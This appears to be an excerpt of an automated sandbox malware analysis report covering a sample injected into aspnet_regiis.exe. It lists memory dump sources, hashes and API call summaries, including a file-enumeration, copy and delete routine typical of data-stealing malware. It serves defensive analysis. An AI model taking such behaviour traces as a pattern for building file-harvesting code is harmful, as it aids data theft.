                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NameName::
                                                                                                                                                                              • String ID: {flat}
                                                                                                                                                                              • API String ID: 1333004437-2606204563
                                                                                                                                                                              • Opcode ID: 6e7c42c3e58c0ad504425cb734ed7d0beb55362689dd2e4755411f7c7ee387dc
                                                                                                                                                                              • Instruction ID: e4354b3537bde7b1fdef3b8c26f137e9241175f43ca1fc8264cf67ac040ba9a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 6e7c42c3e58c0ad504425cb734ed7d0beb55362689dd2e4755411f7c7ee387dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 19F0ED311843889FCB01DF58D284BA43BA1BF4176AF088084F94D8F686CF71E482CB91
                                                                                                                                                                              Function 02A0141E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 587104284-2766056989
                                                                                                                                                                              • Opcode ID: de0ee014be6b0121cc03023c6516f93e2da1067d69be9b3bca7764b0214847ec
                                                                                                                                                                              • Instruction ID: 9a39f9b27fb9310836b3ceca96197837c46ef56f9a6b68903346ec1711226070
                                                                                                                                                                              • Opcode Fuzzy Hash: de0ee014be6b0121cc03023c6516f93e2da1067d69be9b3bca7764b0214847ec
                                                                                                                                                                              • Instruction Fuzzy Hash: EFE0BFF0D402089BDB40EFA4DE46B5DB7F9AB08704F500469AA06E7280EA74EA1A9A55
                                                                                                                                                                              Function 02A1665F Relevance: 5.1, APIs: 4, Instructions: 73stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A166A7
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36B4C), ref: 02A166C4
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A166D7
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36B50), ref: 02A166E9
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16018
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindFirstFileA.KERNEL32(?,?), ref: 02A1602F
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB4), ref: 02A16050
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB8), ref: 02A1606A
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16091
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36647), ref: 02A160A5
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160C2
                                                                                                                                                                                • Part of subcall function 02A15FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 02A160EF
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?), ref: 02A16125
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD0), ref: 02A16137
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A1614A
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD4), ref: 02A1615C
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A16170
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160D9
                                                                                                                                                                                • Part of subcall function 02A15FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 02A16229
                                                                                                                                                                                • Part of subcall function 02A15FD1: DeleteFileA.KERNEL32(?), ref: 02A1629D
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindNextFileA.KERNEL32(?,?), ref: 02A162FF
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindClose.KERNEL32(?), ref: 02A16313
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                              • Opcode ID: 0cff7d271fd0fd0720fb830a7a749170aa714dc0e7dcdbb06b52dbfca6d5807c
                                                                                                                                                                              • Instruction ID: 8aa2221a50c750d734597bc302443187cea484c568e01ac87b5f15c4458b3c53
                                                                                                                                                                              • Opcode Fuzzy Hash: 0cff7d271fd0fd0720fb830a7a749170aa714dc0e7dcdbb06b52dbfca6d5807c
                                                                                                                                                                              • Instruction Fuzzy Hash: 97219235D8022CAFDB50EF60DC45AD9B7B9EB14300F4045A5B649A3240EF70DBD48F81